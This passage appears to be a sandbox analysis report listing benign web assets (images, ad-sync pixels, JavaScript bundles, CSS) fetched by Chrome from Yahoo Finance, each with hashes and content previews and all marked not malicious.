                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8D0E2B71FDFF86FC8E73168655C8CCB1BCFBD6E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9023E74B233B0849864C39C246F2E53EDC1C4CD894C34A7E00245EA13EBB50FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7A5CDB7AD64FD34E13157117F1586B94E6ECBF56A4299E3DC8F2BAA3BA48D6EAE43A7012729DA9167B79628B05CC5F9F2B671A1DAF4C8A168EC6D96731512885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/BdrXtbFtdHZFBGTr4iYGaQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2021-01/8fcd9e10-4e8b-11eb-9fdf-5bd1b68e439b.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFFH&..WEBPVP8X.... ...+.....ICCPH......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cm.g.doubleclick.net/pixel?google_nid=triplelift&gdpr=0&gdpr_consent=&us_privacy=&google_hm=MzgxMTIzOTY2NDcxNTM3NTc3MDQzNQ%3D%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1274)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1275
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.795239734124899
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:DHdqCkiX42MaXRX5m5E1HgRidD7TjWcG+AKWJTIVEHK1zpMFqYJC/BHzsmLgm0P:cCkgMahJmOHg8jn0KO7HSbzdG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CAC11CC71C84D5C93A68CC7EED9414AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:78ED32E481B51AFB91AD1FF7D256AF0F53DF99C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2B7868E975C5873173C5BF0AE56CDDB4FA15A64522A4AC55AECA9DB78B180157
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:104F659CFDCBAFF592B285B18DD7C554425E225D091B3C5B704FD231CBE7E0E6E13A5993DBEF859403EB876FF0B237DFFA6A9F02EBC3051AC133DC098E5FAD4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const v='<svg xmlns="http://www.w3.org/2000/svg" data-name="Layer 1" viewBox="0 0 24 24"><path d="M24 12c0-6.63-5.37-12-12-12S0 5.37 0 12c0 5.99 4.39 10.95 10.12 11.85v-8.39H7.07v-3.47h3.05V9.35c0-3.01 1.79-4.67 4.53-4.67 1.31 0 2.69.23 2.69.23v2.95h-1.51c-1.49 0-1.96.93-1.96 1.87v2.25h3.33l-.53 3.47h-2.8v8.39c5.74-.9 10.12-5.86 10.12-11.85Z"/></svg>',s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 0C5.372 0 0 5.372 0 12s5.372 12 12 12 12-5.372 12-12S18.628 0 12 0M8.644 17.02h-2.34V9.534h2.34zM7.41 8.597h-.019c-.848 0-1.397-.572-1.397-1.299 0-.74.567-1.298 1.43-1.298.862 0 1.392.558 1.41 1.298.006.722-.543 1.299-1.424 1.299M18 17.02h-2.653v-3.872c0-1.012-.413-1.706-1.327-1.706-.698 0-1.087.469-1.265.919-.066.16-.057.384-.057.614v4.045h-2.63s.034-6.862 0-7.486h2.63v1.177c.155-.516.994-1.247 2.335-1.247 1.664 0 2.967 1.078 2.967 3.394z"/></svg>',h='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.881 17.183h1.49L9.512 7.58H8.02z"/><path
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8353), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8353
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1972886663817555
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:3XumTufAC6+AjK90NDqU4Pwf+f/OZ00HY+Zy4+X71:3emif3GK90AUhu/hx4+L1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:11CF4F9BFF98FC79F8EECF2894832023
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:92025912195839DD8724CB90840A5E584DD2DD54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2061ABEA33CED95A6B541BD41CAB6EC3FBBD789ACD1A6A93213F98CBA182AD6F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9368BAD1C1EBBB82EE69A45D728F5B66643520F828D1AB44A61D227B5408F4C607867DFCF2C8BA43F913E92D26870CE96412E19F46F90C8A95E69FB7BC1C0E34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-benji-1.2.0-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-benji",[],t):"object"==typeof exports?exports["wafer-benji"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-benji"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12999)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.55794925884855
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:gydND/2udByGgEzC4IHy5gI4fFb/R8mstacFTuz:pz2ud1gEzTBgI4fh58msgsTuz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8EB9B41C340492F9B282E3B504FDD1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:ABF4E716B91BCF21E4C073522F50D0859D169D71
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:757E40E5FC942C6E70580AE3675ACDFC684EA4C39EC8E39BFA5E859B26F39197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B9CC89A9A2EE279A2C89149708B06601843D1E8A874D7D2DF3E53873C08D91F7C726F851EA109A4C27FC660EBAFE9EDC6F9C82331905065147CEB2C07A1FD0D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as oe,g as G,t as I,P as ie,e as ce}from"./commonUtil.BWwawKjd.js";import{l as fe}from"./loadMeta.DU0UCbRu.js";import{u as ue,i as me}from"./initializePage.LkEoQoQZ.js";import{a as de,n as z}from"./sectorUtil.BRaMmV9S.js";import{s as B,e as N,t as K,b as W,d as M,f as R,h as q,i as b,j as H,q as $,L as X,k as P,l as E,m as V,x as _e,o as pe,I as ge,y as he,G as Se,Q as ve,c as we,u as be,g as Ee,a as $e,p as Z,n as re}from"./scheduler.Dsuh-FKt.js";import{S as Y,i as j,t as y,g as ye,a as C,e as Ce,c as O,b as D,m as A,d as L}from"./index.CvwOawEI.js";import{e as x}from"./each.CI2tb2RB.js";import{I as Te}from"./Icon.C8w5V9EK.js";import{C as Ne}from"./expand_more.DscV4c36.js";import{d as Me}from"./quoteUtil.C6mXO8A-.js";import Re from"./Ads.t43t7gLT.js";import{D as Ie}from"./Dock.LWSU71Xy.js";import{F as ke}from"./FeatureBarNeo.H3Vjt37C.js";import{L as Oe}from"./Layout.xFkIASKc.js";import{M as De}from"./MarketsNavBar.DK2-5i5s.js";import{S as Ae}from"./SectionWithSidebar.Cjxf8hNi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65468)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):227170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.308661683315594
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:cGOqLheW3FmZV47GM5KAJusCdEsh6Igqk:cGO1WVmZCSCKANshXgR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:56907833EB8A9FDC98437EA2710B80EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:03A42588427996DF4766606DECF1A58433E61DA7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A663CA7A725F597101CF273A92D91996DC385B8A42278D2E40CABE636D147AC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:865FFABA5EBCDEF90E8514B44AD8F778447C1284FEB30AD966F5B6AB18DC2FB6C1C69D100848A3BB02D10041879BE2B42FE073ADD3A481E01682198569B8EAAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/346-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see 346-bundle.js.LICENSE.txt */.(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[346],{19990:(e,t,n)=>{"use strict";var r,a,o,i,l;n.r(t),n.d(t,{EngagementType:()=>l,MessageModeratingStages:()=>r,MessageModeratingVerdict:()=>a,MessageStatus:()=>o,ModerationNotificationStatus:()=>i}),function(e){e.LOADING="LOADING",e.FINISHED="FINISHED",e.FAILED="FAILED"}(r||(r={})),function(e){e.APPROVE="APPROVE",e.REJECT="REJECT"}(a||(a={})),function(e){e.Approved="approved",e.Blocked="blocked",e.Pending="pending",e.Highlighted="highlight",e.Reported="reported"}(o||(o={})),function(e){e.UserRejected="user-rejected",e.MessageUnavailable="message-unavailable",e.CommentRejected="comment-rejected",e.AppealRejected="appeal-rejected",e.AppealApproved="appeal-approved",e.ReportRejected="report-rejected",e.ReportApproved="report-approved",e.ReportAppealRejected="report-appeal-rejected",e.ReportAppealApproved="report-appeal-approved",e.Reinstat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1734), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1734
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.602079809045733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:jTg0n77+kFjdAUiUusyuqjuasedCKAHdq:N7pDA+fEjuafdCbdq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:77E9E4C4C8B37739466215D5C2899982
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6B0D10C70659A6BAF1E1A70A3B44A197DC8DEE4A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9FCF43CCE5B720A69329E730AF846F257FA70867FE75466156C303E18698A026
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3754EE691BDFAB02441BC7C1180C9B79708B117C046C63F0448DCFCF054273EABD2B310A08FA3B3C4875A65929C9A61C18E929FBBBBE2BF7B5F71665DB1443C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=84124453&p=0&s=0&a=0&ptask=ALL&np=0&fp=0&rp=0&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncIframePixel('https://dis.criteo.com/dis/usersync.aspx?r=3&p=4&cp=pubmaticUS&cu=1&&gdpr=0&gdpr_consent=&url=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5MjgmdGw9NDMyMDA=&piggybackCookie=uid:@@CRITEO_USERID@@');PubMatic.loadAsyncIframePixel('https://cms.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?idmatch=0&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://x.bidswitch.net/sync?ssp=pubmatic&gdpr=0&gdpr_consent=&us_privacy=#US_PRIVACY');PubMatic.loadAsyncIframePixel('https://t.adx.opera.com/pub/sync?pubid=pub8730968190912');PubMatic.loadAsyncIframePixel('https://dsp-cookie.adfarm1.adition.com/?ssp=9&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://pubmatic-match.dotomi.com/match/bounce/current?networkId=17100&version=1&nuid=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync.srv.stackadapt.com/sync?nid=11&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync-tm.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65504), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):73447
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.315425597976914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:NNDF5DvyAoNTQaRX7tbMNC1fNZz4zKTGkvOsZ0CJ/h:Nn5D0kgxD/h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:841DABCE0B477A93D9CF7379B9EB1368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F1AFDA122D766036A7C3418D785C17168106A391
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1616C8CD083E6B17F6A75AB0695BD4A4573B31AE8398FFB43758288028F6A773
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F8B298EFFAB6828E6386061FBC87CF6924EB9DBCAF82C559F76F6A8D924A752D97B6FD750BEB90CAC7D32B995903A7A075A17D18060B632DA416444B81943406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://warp.media.net/rtb/resources/release-20231121-135-adperformance.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function t(e,t,n){return e(n={path:t,exports:{},require:function(e,t){return function(){throw new Error("Dynamic requires are not currently supported by @rollup/plugin-commonjs")}(null==t&&n.path)}},n.exports),n.exports}var n,r,i=function(e){return e&&e.Math===Math&&e},o=i("object"==typeof globalThis&&globalThis)||i("object"==typeof window&&window)||i("object"==typeof self&&self)||i("object"==typeof e&&e)||i("object"==typeof e&&e)||function(){return this}()||Function("return this")(),a=Object.defineProperty,u=function(e,t){try{a(o,e,{value:t,configurable:!0,writable:!0})}catch(n){o[e]=t}return t},c=o["__core-js_shared__"]||u("__core-js_shared__",{}),s=t((function(e){(e.exports=function(e,t){return c[e]||(c[e]=void 0!==t?t:{})})("versions",[]).push({version:"3.33.3",mode:"global",copyright:". 2014-2023 Denis Pushka
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (806)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):807
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.392386562636783
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:0vPb+kNVuqb8mKB6jB18mKBfiHTaKm3Bu:wP7N4mw6Mmwfi2nxu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6BA1632EA17142416A2D1E96AF7812CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:294BF4AC0B38E21E9AC1C7FE0C713A52F856BE17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:052BB52E6D73962B565982A734669D7EBF018DC099ACDE8B7DFFBE30BAE65495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9527C8986004A98187243B1C40F31B4415333E97E817650037E92D3263EF1EEDEFF80F20C4507F57264BDAD2FD6814448E0681B5CBD98A2A0EE2C3EBC1B733B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{t as m,v as u}from"./commonUtil.BWwawKjd.js";import{m as d}from"./utils.CNaWwYSx.js";const o=d(["168x126"]),S={imageSize:o.sizeMap["168x126"],imageTags:o.tags,isPagination:!0,queryRef:"newsAll"},P=["^YH311","^YH102","^YH308"];function b(a){var r,t;const{params:e}=a,s=(r=e==null?void 0:e.sector)==null?void 0:r.replace(/\?.*/,"").trim().toLowerCase();return{industry:(t=e==null?void 0:e.industry)==null?void 0:t.replace(/\?.*/,"").trim().toLowerCase(),sector:s}}function h(a=[]){const s=[{key:"sectors",name:m("SECTORS",{ns:"sectors"})},...a];return s.filter(Boolean).map(({key:n,name:r},t)=>{const c=s.slice(1,t+1).map(({key:l})=>l),[i,g]=c;return{href:u({sector:i,industry:g}),i13n:{elm:"sector",sec:"sector-breadcrumb",subsec:t===0?"sectors-all":n},title:r}})}export{b as a,P as d,h as g,S as n};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2776134368191165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YMj98W:/B8W
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:94F3E250EF82EA04F7645C5653F99484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E658EFBCCC394F9F6863C006A466759897810A87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:81848FA922F902C6DC9B95ABC63CF6468C651AEEAD5FFA99D85CEB27EF7773D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:04D53AC8419EA61C356F6B30C950D8FA98BC3A4C03A3611EFB70197512811750EABC71173472F395D91C5B91639130190375585F7ECB9DBAA5863288F9940CA0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://query2.finance.yahoo.com/v1/test/getcrumb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:dUR8vedpXY3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2371)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.940514976925178
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:uR7RY4zvNJaR7RhR7RARURYlR7RbR7RwRtRY8RJRYaR7RYeER7RYR7RYdrR7RYgX:H4zvP5TPdUMJHEGy6V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0F20ECC505B3965168E294542D8F5880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:96C60F7C64246006531470D662FCA3E7271CB24E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DAB85771228CFCCB97F50BCF40D8FA5655B08DB90F00D0A9466D0B21A63D0FD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:891C047D9FBE02AF664FE4DB8C4B9FE3BBC9B39671198EC1FADE9FB3EAD2B5361952A04DCD536CA94340B515F3EA890ACEF94E88973FBFA67DC8B57A27362752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Autocomplete.q9sgwYZU.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.finsrch-rslt.yf-cs8l6v.yf-cs8l6v{border-bottom-right-radius:1.25rem;border-bottom-left-radius:1.25rem;box-shadow:0 4px 12px #00000026,0 0 1px #0000001a;background-color:var(--surface2);position:absolute;width:100%;word-break:break-all;white-space:nowrap;left:0;z-index:10;overflow-y:auto}.formContainer.yf-cs8l6v.yf-cs8l6v{width:100%}form.yf-cs8l6v.yf-cs8l6v{position:relative}form.header-srch.yf-cs8l6v .finsrch-rslt.yf-cs8l6v{border-bottom-right-radius:0;border-bottom-left-radius:0}.finsrch-inpt.yf-cs8l6v.yf-cs8l6v{display:inline-block;width:100%;border:0;text-align:left;line-height:1.25;height:2.5rem;padding:var(--space-3);padding-left:var(--space-7);font-size:var(--font-l)}.finsrch-inpt.rounded.yf-cs8l6v.yf-cs8l6v,.finsrch-inpt.yf-cs8l6v .fixed-rounded.yf-cs8l6v{border-radius:var(--border-radius-xl)}.finsrch-inpt.yf-cs8l6v .fixed-squared.yf-cs8l6v{border-radius:var(--border-radius-s)}.finsrch-inpt.bordered.yf-cs8l6v.yf-cs8l6v{border:1px solid var(--light-divider)}.finsrch-inpt.yf-cs8l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.545226546244481
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YTyLSHyUKpXRdH/UIfLUtPVdH2bQQOGLT4:YWLSHyUOH/RfgtPVIbQQbn4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9E1462680605FB3527A80A117815247E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E65FC475714B3B4ABC13B889F7B1420D27A4FD52
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:718672F757B6DF73594D37326A4639B46C3CACB902A7816FB6D64AFB12BE1E5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DAB489486E6B43ECE279B05BC56B0A43C7721E5EE858F96A48FB960930E67F66AFEA75B2482F70F9649E785E4641E4E9F87C0301BA930A1849A5582D0D7F173E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://id.a-mx.com/sync?tao=1&&uid=85b2d118-423d-4245-b001-a881df171c6a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"version":"v3","id":"amx*3*85b2d118-423d-4245-b001-a881df171c6a*08b17ccc28422c2538145878e50aa866"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (49215)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):49303
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.332003974067995
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:cs5YFNH3tY9Z4nTm0a/l/DYuXyozLdmg1z52eQOAbVAzxl6ytIwAFlt1aAvA8ie6:N4nTmT/D7JiA+1uuMhL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DE1AF2434303255EEC1B0DC77CB2AC5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0D5DAB396BC33D293C22E92CD834BD02F45CE3CC
